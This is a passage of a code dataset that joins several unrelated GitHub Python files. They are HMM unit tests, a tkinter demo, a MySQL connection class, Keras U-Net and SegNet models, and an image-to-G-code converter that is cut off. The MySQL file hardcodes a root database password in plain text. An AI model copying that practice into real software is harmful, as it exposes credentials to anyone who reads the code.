self.hmm2._weighting_factor_Pall(set_obs)\n self.failUnless(P == resP)\n\n def test_Weighting_factor_Pall_2(self):\n set_obs = [['1', '3'], ['1', '2'], ['2', '2']]\n resP = 1./256\n P = self.hmm1._weighting_factor_Pall(set_obs)\n self.failUnless(P == resP)\n\n def test_Weighting_factor_Pk_1(self):\n obs = ['1', '2']\n resP = 1./2\n P = self.hmm2._weighting_factor_Pk(obs)\n self.failUnless(P == resP)\n\n def test_Weighting_factor_Pk_2(self):\n obs = ['1', '3']\n resP = 1./8\n P = self.hmm1._weighting_factor_Pk(obs)\n self.failUnless(P == resP)\n\nclass TestWeightingFactorC(TestWeightingFactor):\n hmmKlass = hmmc.HMM_C\n\nclass TestWeightingFactorF(TestWeightingFactor):\n hmmKlass = hmmf.HMM_F\n\nclass TestStates(unittest.TestCase):\n hmmKlass = hmmS.HMMS\n\n def setUp(self):\n self.hmm1 = hmmS.HMMS(['a', 'b', 'c'], ['1', '2', '3'])\n self.hmm2 = hmmS.HMMS(['a', 'b'], ['1', '2'])\n self.aHMM_1 = hmmS.HMMS( ['a', 'b'], ['1', '2', '3'], \n array([[0.7, 0.3],[0.2, 0.8]]),\n array([[0.2, 0.4], [0.6, 0.2], [0.2, 0.4]]),\n array([0.2, 0.8]))\n\n def test_learn_A_1(self):\n states = ['a','a','b','a','c','b','c','a','b','a','c','b','a']\n result = array([[0.2, 0.4, 0.4], [0.75, 0, 0.25], [1./3, 2./3, 0]])\n self.hmm1._learn_A(states)\n self.failUnless( allclose(result, self.hmm1.A))\n\n def test_learnA_2(self):\n states = ['a', 'b', 'a', 'a', 'a', 'b', 'a']\n result = array([[0.5, 0.5, 0.], [1., 0., 0.], [0., 0., 1.]])\n self.hmm1._learn_A(states)\n self.failUnless( allclose(result, self.hmm1.A))\n \n def test_multiple_learnA(self):\n states = [['a', 'b'] * 3, ['b', 'a'] * 2]\n result = array([[0., 1.], [1., 0.]])\n self.hmm2._multiple_learn_A(states)\n self.failUnless( allclose(result, self.hmm2.A))\n\n def test_baumwelch(self):\n chain = ['1', '1'] * 4\n states = ['b', 'a'] + ['a', 'a'] * 3\n resA = array([[1., 0.], [1., 0.]])\n resB = array([[1., 1.], [0., 0.]])\n resPI = array([0.5, 0.5])\n self.hmm2.learn(chain, states)\n self.hmm2.checkHMM()\n self.failUnless( allclose(resA, self.hmm2.A))\n self.failUnless( allclose(resB, self.hmm2.B))\n self.failUnless( allclose(resPI, self.hmm2.pi))\n\n def test_multiple_learn_1(self):\n chains = [ ['1','2','2','2','2'], ['1','2','2','2','2','2','2'],\n ['2','2','2','2','2','2','2']]\n states = [['a'] + ['b'] * 4, ['a'] + ['b'] * 4, ['b'] * 5]\n self.hmm2.multiple_learn(chains, states)\n self.hmm2.checkHMM()\n\n def test_ens_average_1(self):\n chains = [ ['1'] + ['2'] * 4, ['1'] + ['2'] * 4, ['2'] * 5]\n states = [ ['a'] + ['b'] * 4, ['a'] + ['b'] * 4, ['b'] * 5 ]\n self.hmm2.ensemble_averaging(chains, states, \"unit\", 1000, 0)\n self.hmm2.checkHMM()\n\n def test_ens_average_2(self):\n chains = [['1', '1'] * 4] * 5\n states = [['b', 'a'] + ['a', 'a'] * 3] * 5\n resA = array([[1., 0.], [1., 0.]])\n resB = array([[1., 1.], [0., 0.]])\n resPI = array([0.5, 0.5])\n self.hmm2.ensemble_averaging(chains, states, \"unit\" , 1000, 0)\n self.hmm2.checkHMM()\n self.failUnless( allclose(resA, self.hmm2.A))\n self.failUnless( allclose(resB, self.hmm2.B))\n self.failUnless( allclose(resPI, self.hmm2.pi))\n\nclass TestStatesC(TestStates):\n hmmKlass = hmmS.HMMS_C\n\nclass TestStatesF(TestStates):\n hmmKlass = hmmS.HMMS_F\n\nclass TestDeterministic(unittest.TestCase):\n \"\"\"Test the viterbi algorithm on a deterministic chain\"\"\"\n\n hmmKlass = hmm.HMM\n\n def setUp(self):\n self.hmm = self.hmmKlass(['a', 'b'], ['1', '2', '3'],\n array([[1.0, 0.0],\n [0.0, 1.0]]),\n array([[0.5, 0.0],\n [ .5, .5],\n [0.0, 0.5]]),\n array([0.5, 0.5]))\n\n def _analyze_chain(self, mc, chain, result=None):\n an1 = mc.analyze(chain)\n an2 = mc.analyze_log(chain)\n self.assertEqual(an1, an2)\n if result:\n self.assertEqual(an1, result)\n\n def test_viterbi_1(self):\n \"\"\"Test the chain (1,1,1) [determ]\"\"\"\n chain = ['1'] * 3\n result = ['a', 'a', 'a']\n self._analyze_chain(self.hmm, chain, result)\n\t\t\n def test_viterbi_2(self):\n \"\"\"test the chain (2,1,1,1,1,1) [determ]\"\"\"\n result = ['a', 'a', 'a', 'a', 'a', 'a']\n chain = ['2'] + ['1'] * 5\n self._analyze_chain( self.hmm, chain, result)\n\n def test_viterbi_3(self):\n \"\"\"test the chain (3,2,2,2,2,2) [determ]\"\"\"\n chain = ['3'] + ['2'] * 5\n result = ['b', 'b', 'b', 'b', 'b', 'b']\n self._analyze_chain( self.hmm, chain, result)\n\n def test_viterbi_4(self):\n \"\"\"test the chain (2,2,3,3,3,2) [determ]\"\"\"\n chain = ['2', '2', '3', '3', '3', '2']\n result = ['b', 'b', 'b', 'b', 'b', 'b']\n self._analyze_chain( self.hmm, chain, result)\n\n def test_viterbi_5(self):\n \"\"\"test the chain (2,2,2,2,2,3) [determ]\"\"\"\n chain = ['2', '2', '2', '2', '2', '3']\n result = ['b', 'b', 'b', 'b', 'b', 'b']\n self._analyze_chain( self.hmm, chain, result)\n\n\nclass TestDeterministicHmmC(TestDeterministic):\n hmmKlass = hmmc.HMM_C\n\nclass TestDeterministicHmmF(TestDeterministic):\n hmmKlass = hmmf.HMM_F\n\nclass test_baumwelch(unittest.TestCase):\n \"\"\"Test the Baumwelch algorithm\"\"\"\n\n def setUp(self):\n self.aHMM = hmm.HMM( ['a', 'b'], ['1', '2', '3'])\n self.aHMMC = hmmc.HMM_C( ['a', 'b'], ['1', '2', '3'])\n self.aHMMF = hmmf.HMM_F( ['a', 'b'], ['1', '2', '3'])\n \n self.aHMM_1 = hmm.HMM( ['a', 'b'], ['1', '2', '3'], \n array([[0.7, 0.3], [0.2, 0.8]]),\n array([[0.2, 0.4], [0.6, 0.2], [0.2, 0.4]]),\n array([0.2, 0.8]))\n self.aHMM_C = hmmc.HMM_C( ['a', 'b'], ['1', '2', '3'], \n array([[0.7, 0.3], [0.2, 0.8]]),\n array([[0.2, 0.4], [0.6, 0.2], [0.2, 0.4]]),\n array([0.2, 0.8]))\n self.aHMM_F = hmmf.HMM_F( ['a', 'b'], ['1', '2', '3'], \n array([[0.7, 0.3], [0.2, 0.8]]),\n array([[0.2, 0.4], [0.6, 0.2], [0.2, 0.4]]),\n array([0.2, 0.8]))\n self.det = hmm.HMM(['a'], ['1', '2'])\n self.test = hmm.HMM( range(5), range(5) )\n self.det2 = hmm.HMM(['a', 'b'], ['1', '2'] )\n\n def _learn_compare(self, chain): \n self.aHMM.learn(chain)\n self.aHMMC.learn(chain)\n self.aHMMF.learn(chain)\n \n self.failUnless(allclose(self.aHMMC.A, self.aHMM.A))\n self.failUnless(allclose(self.aHMMF.A, self.aHMM.A))\n self.failUnless(allclose(self.aHMMC.B, self.aHMM.B))\n self.failUnless(allclose(self.aHMMF.B, self.aHMM.B))\n self.failUnless(allclose(self.aHMMC.pi, self.aHMM.pi))\n self.failUnless(allclose(self.aHMMF.pi, self.aHMM.pi))\n\n def test_update_iterb(self):\n B_bar = array([[ 0., 0.], [ 0., 0.], [ 0., 0.]])\n B_barF = array([[ 0., 0.], [ 0., 0.], [ 0., 0.]])\n B_barC = array([[ 0., 0.], [ 0., 0.], [ 0., 0.]])\n gamma = array([[0.17584567, 0.82415433], [0.43775031, 0.56224969],\n [0.43195352, 0.56804648], [0.44859571, 0.55140429],\n [0.43240921, 0.56759079], [0.44861501, 0.55138499],\n [0.43241002, 0.56758998], [0.448615, 0.551385 ],\n [0.43240908, 0.56759092], [0.44859262, 0.55140738],\n [0.43188047, 0.56811953], [0.43601172, 0.56398828],\n [0.13479001, 0.86520999], [0.13445915, 0.86554085],\n [0.41918731, 0.58081269], [0.44750776, 0.55249224],\n [0.41943579, 0.58056421], [0.14038371, 0.85961629],\n [0.41931846, 0.58068154], [0.44469141, 0.55530859]])\n\n obs_indices = [0,1,0,1,0,1,2,1,2,1,0,1,0,1,0,1,2,1,0,2] \n self.aHMM.update_iter_B( gamma, obs_indices, B_bar )\n self.aHMMC.update_iter_B( gamma, obs_indices, B_barC )\n self.aHMMF.update_iter_B( gamma, obs_indices, B_barF )\n self.failUnless( allclose(B_bar, B_barC))\n self.failUnless( allclose(B_bar, B_barF))\n \n def test_baumwelch_1(self):\n \"\"\"test the observations (1,2,1,2,1,2,1,2,1,2) \"\"\"\n chain = ['1', '2'] * 5 \n self._learn_compare(chain)\n\n def test_baumwelch_2(self):\n \"\"\"test the observations (1,1,1,1,1,2,2,2,2,2) \"\"\"\n chain = ['1'] * 5 + ['2'] * 5\n self._learn_compare(chain)\n\n def test_baumwelch_3(self):\n \"\"\"test the observations (3,3,3,3,3,3,3,3,3,1) \"\"\"\n chain = ['3'] * 9 + ['1']\n self._learn_compare(chain)\n\n def test_baumwelch_4(self):\n \"\"\"test the observations (1,2,1,2,1,2,1,2,1,2) \"\"\"\n chain = ['1', '2'] * 5 \n self._learn_compare(chain)\n\n def test_baumwelch_6(self):\n chain = ['2'] * 2\n resA = self.det.A\n resB = array([[0.], [1.]])\n respi = self.det.pi\n self.det.learn(chain)\n self.failUnless( allclose(resA, self.det.A))\n self.failUnless( allclose(resB, self.det.B))\n self.failUnless( allclose(respi, self.det.pi))\n\n def test_baumwelch_7(self):\n observation = self.test.simulate(10)\n self.test.set_random_proba()\n self.test.learn(observation)\n self.test.checkHMM()\n\n def test_multiple_learn_1(self):\n chains = []\n for i in xrange(10):\n chains.append(self.aHMM.simulate(10))\n A = self.aHMM.A\n B = self.aHMM.B\n PI = self.aHMM.pi\n self.aHMM.multiple_learn(chains)\n self.aHMM.checkHMM()\n self.failUnless( allclose(self.aHMM.A, A))\n self.failUnless( allclose(self.aHMM.B, B))\n self.failUnless( allclose(self.aHMM.pi, PI))\n\n def test_multiple_learn_2(self):\n chains = [ ['1','2','2','2','2'], ['1','2','2','2','2','2','2'],\n ['2','2','2','2','2','2','2']]\n self.aHMM_1.multiple_learn(chains)\n self.aHMM_1.checkHMM()\n self.aHMM_C.multiple_learn(chains)\n self.aHMM_C.checkHMM()\n self.aHMM_F.multiple_learn(chains)\n self.aHMM_F.checkHMM()\n self.failUnless( allclose(self.aHMM_1.A, self.aHMM_C.A))\n self.failUnless( allclose(self.aHMM_1.A, self.aHMM_F.A))\n self.failUnless( allclose(self.aHMM_1.B, self.aHMM_C.B))\n self.failUnless( allclose(self.aHMM_1.B, self.aHMM_F.B))\n self.failUnless( allclose(self.aHMM_1.pi, self.aHMM_C.pi))\n self.failUnless( allclose(self.aHMM_1.pi, self.aHMM_F.pi))\n\n def test_multiple_learn_3(self):\n chains = [ ['1','2','2','2','2'], ['1','2','2','2','2','2','2'],\n ['2','2','2','2','2','2','2']]\n self.aHMM_1.multiple_learn(chains)\n self.aHMM_1.checkHMM()\n self.aHMM_C.multiple_learn(chains)\n self.aHMM_C.checkHMM()\n self.aHMM_F.multiple_learn(chains)\n self.aHMM_F.checkHMM()\n self.failUnless( allclose(self.aHMM_1.A, self.aHMM_C.A))\n self.failUnless( allclose(self.aHMM_1.A, self.aHMM_F.A))\n self.failUnless( allclose(self.aHMM_1.B, self.aHMM_C.B))\n self.failUnless( allclose(self.aHMM_1.B, self.aHMM_F.B))\n self.failUnless( allclose(self.aHMM_1.pi, self.aHMM_C.pi))\n self.failUnless( allclose(self.aHMM_1.pi, self.aHMM_F.pi))\n\n def test_multiple_learn_4(self):\n chains = [ ['2'] * 2, ['2'] * 3, ['2'] * 4]\n resA = self.det.A\n resB = array([[0.], [1.]])\n respi = self.det.pi\n self.det.multiple_learn(chains)\n self.failUnless( allclose(resA, self.det.A))\n self.failUnless( allclose(resB, self.det.B))\n self.failUnless( allclose(respi, self.det.pi))\n\n def test_multiple_learn_5(self):\n chains = []\n for i in xrange(10):\n chains.append(self.test.simulate(20))\n self.test.set_random_proba()\n self.test.multiple_learn(chains)\n self.test.checkHMM()\n\nclass TestEnsembleAveraging(unittest.TestCase):\n def setUp(self):\n self.det = hmm.HMM(['a'], ['1', '2'])\n self.test = hmm.HMM( ['a', 'b'], ['1', '2'] )\n self.gen = hmm.HMM( ['a', 'b'], ['1', '2'],\n array([[0.7, 0.3], [0.2, 0.8]]),\n array([[0.2, 0.6], [0.8, 0.4]]),\n array([0.5, 0.5]))\n self.aHMM = hmm.HMM(['a', 'b'], ['1', '2'])\n\n def test_ens_average_1(self):\n set_observations = [ ['2'] * 2, ['2'] * 3, ['2'] * 4]\n resA = self.det.A\n resB = array([[0.], [1.]])\n respi = self.det.pi\n self.det.ensemble_averaging(set_observations, \"unit\", 1000, 0)\n self.failUnless( allclose(resA, self.det.A))\n self.failUnless( allclose(resB, self.det.B))\n self.failUnless( allclose(respi, self.det.pi))\n\n def test_ens_average_2(self):\n chains = []\n for i in xrange(10):\n chains.append(self.gen.simulate(10))\n self.test.ensemble_averaging(chains, \"unit\", 1000, 1)\n self.test.checkHMM()\n\n def test_ens_average_3(self):\n chains = [ ['1', '2', '2', '2', '2'], ['1', '2', '2', '2', '2'],\n ['2','2','2','2','2','2','2']]\n self.aHMM.ensemble_averaging(chains, \"unit\", 1000, 0)\n self.aHMM.checkHMM()\n\n def test_ens_average_4(self):\n set_observations = [ ['2'] * 2, ['2'] * 3, ['2'] * 4]\n resA = self.det.A\n resB = array([[0.], [1.]])\n respi = self.det.pi\n self.det.ensemble_averaging(set_observations, \"Pall\", 1000, 0)\n self.failUnless( allclose(resA, self.det.A))\n self.failUnless( allclose(resB, self.det.B))\n self.failUnless( allclose(respi, self.det.pi))\n\n def test_ens_average_5(self):\n set_observations = [ ['2'] * 2, ['2'] * 3, ['2'] * 4]\n resA = self.det.A\n resB = array([[0.], [1.]])\n respi = self.det.pi\n self.det.ensemble_averaging(set_observations, \"Pk\", 1000, 0)\n self.failUnless( allclose(resA, self.det.A))\n self.failUnless( allclose(resB, self.det.B))\n self.failUnless( allclose(respi, self.det.pi))\nclass TestPickle(unittest.TestCase):\n \"\"\" test the pickle implementation \"\"\"\n \n hmmKlass = hmm.HMM\n\n def setUp(self):\n self.hmm1 = self.hmmKlass( ['a', 'b'], ['1', '2', '3'])\n self.hmm2 = self.hmmKlass( ['a', 'b'], ['1', '2', '3'])\n self.hmm2.set_random_proba()\n self.hmm3 = self.hmmKlass( ['a'], ['1'])\n self.hmm4 = self.hmmKlass( [], [])\n\n def _compare(self, h1, h2, SaveState=None):\n self.failUnless( allclose(h1.A, h2.A))\n self.failUnless( allclose(h1.B, h2.B))\n self.failUnless( allclose(h1.pi, h2.pi))\n self.failUnless( allclose(h1.N, h2.N))\n self.failUnless( allclose(h1.M, h2.M))\n if SaveState:\n self.failUnless( h1.X_index == h2.X_index) \n self.failUnless( h1.omega_X == h2.omega_X) \n self.failUnless( h1.omega_O == h2.omega_O) \n self.failUnless( h1.O_index == h2.O_index) \n\n def test_pickle_1(self):\n f = open('save.data', 'w')\n self.hmm1.saveHMM(f)\n f.close()\n f = open('save.data', 'r')\n self.hmm2.loadHMM(f)\n f.close()\n self.hmm2.checkHMM()\n self._compare(self.hmm1, self.hmm2)\n os.remove('save.data')\n\n\n def test_pickle_2(self):\n f = open('save.data', 'w')\n self.hmm1.saveHMM(f, 1)\n f.close()\n f = open('save.data', 'r')\n self.hmm3.loadHMM(f)\n f.close()\n self.hmm3.checkHMM()\n self._compare(self.hmm1, self.hmm3)\n os.remove('save.data')\n\n def test_pickle_3(self):\n f = open('save.data', 'w')\n self.hmm1.saveHMM(f, 1)\n f.close()\n f = open('save.data', 'r')\n self.hmm4.loadHMM(f)\n f.close()\n self.hmm4.checkHMM()\n self._compare(self.hmm1, self.hmm4)\n os.remove('save.data')\n\nclass TestPickleHMMC(TestPickle):\n hmmKlass = hmmc.HMM_C\n\nclass TestPickleHMMF(TestPickle):\n hmmKlass = hmmf.HMM_F\n\n\n#suite= unittest.makeSuite(TestLikelihood,'test')\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"gurneyalex/logilab-hmm","sub_path":"test/test_hmm.py","file_name":"test_hmm.py","file_ext":"py","file_size_in_byte":29170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72900383204","text":"from tkinter import *\nimport pygame.mixer\n\napp=Tk()\napp.title(\"hello flip\")\nflipper=IntVar()\n\ndef check_f():\n if(flipper.get()==1):\n print(\"cool\")\n else:\n print(\"not so cool\")\n\n\nCheckbutton(app,command=check_f,variable=flipper,text=\"flip\").pack()\n","repo_name":"agila26/pythonPgms","sub_path":"flipeg.py","file_name":"flipeg.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4515198656","text":"import copy\nimport mysql.connector\n\n\nclass ConnectDB:\n\n def __init__(self):\n # print(\"hello\")\n mydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"Nikhil@123\",\n database=\"LoginData\"\n )\n\n # pointer\n my_cursor = mydb.cursor()\n\n # create Database\n my_cursor.execute(\"CREATE DATABASE IF NOT EXISTS test_db\")\n\n # print all the database name\n # my_cursor.execute(\"SHOW DATABASES\")\n\n # for db in my_cursor:\n # print(db[0])\n\n # count no. of database\n # my_cursor.execute(\"SHOW DATABASES\")\n\n # print('Total count of database := ' + str(len(my_cursor.fetchall())))\n\n my_cursor.execute(\"SHOW DATABASES\")\n tuple_inside_list = my_cursor.fetchall()\n\n generator = (num for num in tuple_inside_list if num[0] == 'test_db')\n\n database_found = False\n for num in generator:\n database_found = True\n\n if database_found:\n print(\"Database found\")\n # my_cursor.execute(\"SHOW DATABASES\")\n try:\n my_cursor = mydb.cursor()\n my_cursor.execute(\"SHOW TABLES\")\n except:\n my_cursor.execute(\"CREATE TABLE\")\n\n\n # def prt(self):\n # print(\"3\")\n\n\n\n","repo_name":"nikhilsasi/RegistrationForm","sub_path":"dev/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28452360031","text":"\nfrom keras.models import Sequential\nfrom keras.layers import Reshape\nfrom keras.layers import Merge\nfrom keras.layers.core import Layer, Dense, Dropout, Activation, Flatten, Reshape, Permute\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.convolutional import Convolution3D, MaxPooling3D, ZeroPadding3D\nfrom keras.layers.convolutional import Convolution2D, MaxPooling2D, UpSampling2D, ZeroPadding2D\nfrom keras.layers.convolutional import Convolution1D, MaxPooling1D\nfrom keras.layers.recurrent import LSTM\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom keras.optimizers import Adam , SGD\nfrom keras.layers.embeddings import Embedding\nfrom keras.utils import np_utils\n# from keras.regularizers import ActivityRegularizer\nfrom keras import backend as K\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#input parameters is pretrained_weights and input size(x3)\n\ndef unet(pretrained_weights = None,input_size = (512,512,1)):\n inputs = Input(input_size)\n \n # Introduced a new layer to scale the architecture for image of size 512 * 512\n # Downsampling\n \n \n ##Layer 1:\n conv = Conv2D(32, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(inputs)\n conv = Conv2D(32, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv)\n pool = MaxPooling2D(pool_size=(2, 2))(conv)\n \n ##Layer 2:\n conv1 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool)\n conv1 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv1)\n pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)\n \n ##Layer 3:\n conv2 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool1)\n conv2 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv2)\n pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)\n \n ##Layer 4:\n conv3 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool2)\n conv3 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv3)\n pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)\n \n ##Layer 5:\n conv4 = Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool3)\n conv4 = Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv4)\n drop4 = Dropout(0.5)(conv4)\n pool4 = MaxPooling2D(pool_size=(2, 2))(drop4)\n\n #########Bottleneck\n conv5 = Conv2D(1024, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool4)\n conv5 = Conv2D(1024, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv5)\n drop5 = Dropout(0.5)(conv5)\n\n \n #Upsampling\n \n ## Upsampling layer 5:\n up6 = Conv2D(512, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(drop5))\n merge6 = concatenate([drop4,up6])\n conv6 = Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge6)\n conv6 = Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv6)\n \n ## Upsampling Layer 4:\n up7 = Conv2D(256, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv6))\n merge7 = concatenate([conv3,up7])\n conv7 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge7)\n conv7 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv7)\n\n ## Upsampling Layer 3:\n up8 = Conv2D(128, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv7))\n merge8 = concatenate([conv2,up8])\n conv8 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge8)\n conv8 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv8)\n\n ## Upsamplng Layer 2:\n up9 = Conv2D(64, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv8))\n merge9 = concatenate([conv1,up9])\n conv9 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge9)\n conv9 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv9)\n \n ## Upsampling Layer 1:\n up10 = Conv2D(32, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv9))\n merge10 = concatenate([conv,up10])\n conv10 = Conv2D(32, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge10)\n conv10 = Conv2D(32, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv10)\n \n conv10 = Conv2D(2, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv10)\n conv11 = Conv2D(1, 1, activation = 'sigmoid')(conv10)\n\n model = Model(input = inputs, output = conv11)\n\n model.compile(optimizer = Adam(lr = 1e-4), loss = 'binary_crossentropy', metrics = ['accuracy'])\n \n #model.summary()\n\n if(pretrained_weights):\n model.load_weights(pretrained_weights)\n\n return model\n\n\n\ndef segnet(nClasses , optimizer=None , input_height=360, input_width=480, kernel = 3, filter_size = 64, pad = 1,pool_size = 2 ):\n \n model = models.Sequential()\n model.add(Layer(input_shape=(3, input_height , input_width )))\n \n # encoder\n model.add(ZeroPadding2D(padding=(pad,pad)))\n model.add(Convolution2D(filter_size, kernel, kernel, border_mode='valid'))\n model.add(BatchNormalization())\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(pool_size, pool_size)))\n \n model.add(ZeroPadding2D(padding=(pad,pad)))\n model.add(Convolution2D(128, kernel, kernel, border_mode='valid'))\n model.add(BatchNormalization())\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(pool_size, pool_size)))\n \n model.add(ZeroPadding2D(padding=(pad,pad)))\n model.add(Convolution2D(256, kernel, kernel, border_mode='valid'))\n model.add(BatchNormalization())\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(pool_size, pool_size)))\n \n model.add(ZeroPadding2D(padding=(pad,pad)))\n model.add(Convolution2D(512, kernel, kernel, border_mode='valid'))\n model.add(BatchNormalization())\n model.add(Activation('relu'))\n \n \n # decoder\n model.add( ZeroPadding2D(padding=(pad,pad)))\n model.add( Convolution2D(512, kernel, kernel, border_mode='valid'))\n model.add( BatchNormalization())\n \n model.add( UpSampling2D(size=(pool_size,pool_size)))\n model.add( ZeroPadding2D(padding=(pad,pad)))\n model.add( Convolution2D(256, kernel, kernel, border_mode='valid'))\n model.add( BatchNormalization())\n \n model.add( UpSampling2D(size=(pool_size,pool_size)))\n model.add( ZeroPadding2D(padding=(pad,pad)))\n model.add( Convolution2D(128, kernel, kernel, border_mode='valid'))\n model.add( BatchNormalization())\n \n model.add( UpSampling2D(size=(pool_size,pool_size)))\n model.add( ZeroPadding2D(padding=(pad,pad)))\n model.add( Convolution2D(filter_size, kernel, kernel, border_mode='valid'))\n model.add( BatchNormalization())\n \n \n model.add(Convolution2D( nClasses , 1, 1, border_mode='valid',))\n \n model.outputHeight = model.output_shape[-2]\n model.outputWidth = model.output_shape[-1]\n \n \n model.add(Reshape(( nClasses , model.output_shape[-2]*model.output_shape[-1] ), input_shape=( nClasses , model.output_shape[-2], model.output_shape[-1] )))\n \n model.add(Permute((2, 1)))\n model.add(Activation('softmax'))\n \n if not optimizer is None:\n model.compile(loss=\"categorical_crossentropy\", optimizer= optimizer , metrics=['accuracy'] )\n \n return model\n\n\n","repo_name":"nikku1234/medimage","sub_path":"model/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33287678070","text":"import cv2\nimport numpy as np\nimport sys\nimport math\n\nprint(sys.setrecursionlimit(3000))\n\ndef distance(a, b):\n return math.sqrt((a[0] - b[0]) ** 2 + (a[1] - b[1]) ** 2)\n\ndef gen_lift_pen_line(lift_height, feed_rate):\n return f'G1 Z{lift_height:.2f} F{feed_rate:.2f}'\n\ndef gen_lower_pen_line(depth, feed_rate):\n return f'G1 Z{-depth:.2f} F{feed_rate:.2f}'\n\ndef gen_move_to_loc_line(x, y):\n return f'G0 X{x:.2f} Y{y:.2f}'\n\ndef fill(x, y, pixels_to_draw, output_blob, h, w):\n if (x, y) not in pixels_to_draw:\n return\n else:\n output_blob.append((x, y))\n pixels_to_draw.remove((x, y))\n neighbours = [(x-1,y),(x+1,y),(x-1,y-1),(x+1,y+1),(x-1,y+1),(x+1,y-1),(x,y-1),(x,y+1)]\n for n in neighbours:\n fill(n[0], n[1], pixels_to_draw, output_blob, h, w)\n\ndef image_to_gcode(image, filename, max_depth=2.0, feed_rate=1000, lift_height=5, max_distance=100, edge_threshold=30, scale_x=1, scale_y=1, pen_thickness=1):\n _, width = image.shape\n gcode_lines = []\n\n gcode_lines.append(\"(G-code output for Universal Robots' Remote TCP & Toolpath URCap)\")\n gcode_lines.append(\"(UR Toolpath Generator Version : 1.0)\")\n gcode_lines.append(\"%PM0\")\n gcode_lines.append(\"N10 G21 G90\")\n\n x, y, w, h = 0, 0, image.shape[1], image.shape[0]\n\n pixels_to_draw = []\n for yy in range(y, y + h):\n for xx in range(x, x + w):\n if image[yy - y, xx - x] > edge_threshold:\n pixels_to_draw.append((xx, yy))\n\n print(\"Number of pixels = \", len(pixels_to_draw))\n blobs = []\n while pixels_to_draw:\n blob = []\n fill(pixels_to_draw[0][0], pixels_to_draw[0][1], pixels_to_draw, blob, width, h)\n blobs.append(blob)\n\n gcode_lines.append(gen_lift_pen_line(lift_height, feed_rate))\n pen_lifted = False\n\n print(\"Number of Blobs = \", len(blobs))\n prev_point = None\n for blob in blobs:\n first_point = blob[0]\n fp_x = first_point[0]\n fp_y = first_point[1]\n\n x_gcode = fp_x / width * 100 * scale_x\n y_gcode = fp_y / h * 100 * scale_y\n depth = max_depth * (1 - image[fp_y - y, fp_x - x] / 255)\n\n if prev_point is not None:\n if distance(prev_point, (x_gcode, y_gcode)) > max_distance:\n gcode_lines.append(gen_lift_pen_line(lift_height, feed_rate))\n pen_lifted = True\n \n if pen_lifted:\n gcode_lines.append(gen_move_to_loc_line(x_gcode, y_gcode))\n gcode_lines.append(gen_lower_pen_line(depth, feed_rate))\n pen_lifted = False\n\n # for each pixel\n for pixel in blob:\n px_x = pixel[0]\n px_y = pixel[1]\n x_gcode = px_x / width * 100 * scale_x\n y_gcode = px_y / h * 100 * scale_y\n depth = max_depth * (1 - image[px_y - y, px_x - x] / 255)\n\n if prev_point is not None:\n if distance(prev_point, (x_gcode, y_gcode)) > pen_thickness:\n # move pen to point\n gcode_lines.append(gen_move_to_loc_line(x_gcode, y_gcode))\n\n prev_point = (x_gcode, y_gcode)\n\n # lift pen\n gcode_lines.append(gen_lift_pen_line(lift_height, feed_rate))\n pen_lifted = True\n\n with open(filename, \"w\") as f:\n f.write(\"\\n\".join(gcode_lines))\n\n#####\n\n# Load the image file\nimage_path = 